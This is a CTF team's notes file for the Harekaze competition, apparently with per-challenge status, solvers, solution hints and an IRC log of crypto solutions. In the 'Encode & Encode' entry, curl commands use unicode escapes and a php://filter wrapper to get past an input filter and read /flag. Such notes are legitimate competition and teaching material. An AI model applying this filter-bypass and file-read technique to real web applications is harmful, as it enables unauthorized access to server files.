* DONE Welcome [Misc 10]

Solved: wasamasa

- Copy and paste that flag!

* DONE scramble [Reversing 100]

Solved: Oblivion

- ELF binary messing around with program memory
- It decompiles in Ghidra, but it's all gibberish
- Oblivion solved it with some code

* DONE ONCE UPON A TIME [Crypto 100]

Solved: WTFH4X

- Cryptosystem doing matrix multiplication with some randomization
- Given the length of the output, there's four possible ways it has
 been created (since it's two parts and randomization allows each to
 happen two ways)
- I have no idea how to solve linear algebra problems :(

* DONE Baby ROP [Pwn 100]

Solved: semchapeu

* TODO The Steganography Generator [Reversing 200]

- Decompiles cleanly
- The Java code mutates certain pixels of the image
- It uses a bytestream composed of some magic bytes followed by the
 flag

* DONE Twenty-five [Crypto 100]

Solved: wasamasa

- Goal: Translate crypto.txt to valid perl code
- I did forego frequency analysis and instead looked for
 unusual/unique words among the reserved keywords list
- =qq= is a good start, from then one one can guess =qx= and continue
 until figuring out all letters
- Searching reserved.txt for patterns like =^a..b$= is the way
- Change the code to =print($text);= to see your progress and comment
 out =eval($text);=
- Evaluating the fully translated code will print the flag

* DONE Encode & Encode [Web 100]

Solved: wasamasa

- The key insight here is that the check is done before JSON decoding
- So, you can enter something not matching the filter, but which
 decodes into something exfiltrating the flag
- A second bypass is required, for this you can use the same trick to
 invoke a PHP wrapper that filters output
- I picked =php://filter= to ROT13-encode the flag on its way out...

#+BEGIN_SRC shell-script
curl -i -H 'Content-Type: application/json' --data '{"page": "./index.html "}' http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "/flag"}' http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "/\u0066lag"}' http://problem.harekaze.com:10001/query.php
curl -i -H 'Content-Type: application/json' --data '{"page": "php\u003a//filter/read=string.rot13/resource=/\u0066lag"}' http://problem.harekaze.com:10001/query.php
#+END_SRC

* DONE Baby ROP 2 [Pwn 200]

Solved: semchapeu

* TODO show me your private key [Crypto 200]

- I don't understand ECC at all
- I should learn some sagemath

* TODO Admin's Product key [Reversing 200]

- No clue

* TODO Login System [Pwn 200]

- semchapeu is taking this one on

* TODO Easy Notes [Web 200]

- Lots of carefully written PHP
- No obvious way to change the session contents
- I've tried to leak the environment variables instead, no luck either
- Maybe it's =$type=?

* DONE [a-z().] [Misc 200]

Solved: WTFH4X

- This one's terrible
- 1337 is 7*191
- You can obtain numbers by using =length= on an array or string
- You can obtain properties without uppercase letters
- You can call functions with 0 or 1 arguments
- I got some numbers out of this, but nothing close
- Crazy idea: Obtain running time and hope it matches eventually
- Crazy idea: Reverse DNS on a numerically represented IP address
- Neither will work because the VM namespace is seriously limited
- There's some top-level functions with short names like
 =console.log.name=
- Candidates can be obtained by pressing the tab key twice inside a
 =node= REPL and testing against the VM
- You can build an algebra by using =concat= on strings and =repeat=
 on lengths
- This together with a short enough primitive for 8 and 7 gives you
 the following term: 7*((8+8+7)*8+7)

* DONE Now We Can Play!! [Crypto 200]

Solved: WTFH4X

- Some funky crypto exchange

* TODO One Quadrillion [Crypto 200]

- Some unreadable hashing function

* TODO Harekaze Note [Pwn 300]

- semchapeu is taking this one on

* DONE Avatar Uploader 1 [Misc 100]

Solved: wasamasa

- The flag can be obtained by triggering an error path in the uploader
- It looks as if you just need a mangled PNG file
- This code gives you the flag:

#+BEGIN_SRC shell-script
convert xc:red -size 1x1 1x1.png
head -c20 1x1.png > broken.png
#+END_SRC

* TODO Avatar Uploader 2 [Web 300]

- The flag is in the file system, so some exfiltration is required

* TODO Ramen [Pwn 400]

- I'll let semchapeu deal with this

* TODO SQLite Voting [Web 350]

- SQL injection, but not was we know it
- The most severe restriction is no whitespace, followed by none of
 the usual characters
- You only get a binary response back

* Other

08:22 < WTFH4X> once upon a time:
08:22 < wasa> you can write it into a file
08:23 < WTFH4X> takenoko is just matrix multiplication % 251 -> so multiply encrypted flag by modular inverse of m2
08:23 < WTFH4X> from left side and from right side, take the one that gives printable flag
08:24 < WTFH4X> now we can play:
08:24 < WTFH4X> pass c1, c2 back to the server
08:25 < WTFH4X> you get back: pow(3, randint(2**16, 2**17), p) * flag % p
08:25 < WTFH4X> just brute all values of that random
08:26 < WTFH4X> for i in xrange(2**16, 2**17):  x = c * inverse(pow(3, i, p), p) % p; if is_printable(x): print(x)
08:26 < WTFH4X> smth like that

You are viewing proxied material from brause.cc. The copyright of proxied material belongs to its original authors. Any comments or complaints in relation to proxied material should be directed to the original authors of the content concerned. Please see the disclaimer for more details.